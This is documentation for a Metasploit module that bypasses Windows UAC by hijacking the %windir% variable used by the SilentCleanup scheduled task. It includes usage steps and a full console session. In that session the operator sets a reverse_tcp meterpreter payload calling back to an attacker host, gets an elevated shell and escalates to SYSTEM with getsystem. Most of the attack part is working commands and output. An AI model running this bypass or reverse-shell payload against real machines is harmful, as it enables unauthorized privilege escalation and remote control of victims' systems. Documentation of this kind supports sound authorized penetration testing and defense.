## Introduction

This module will bypass UAC on any Windows installation with Powershell installed.

There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.

## Usage

1. Create a session on the target system under the context of a local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_silentcleanup`.
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
1. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.

## Scenarios

```
msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP  192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)

msf5 > use exploit/windows/local/bypassuac_silentcleanup 
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    6                yes       The session to run this module on.
   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.1.xx:4444 
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) > 
```
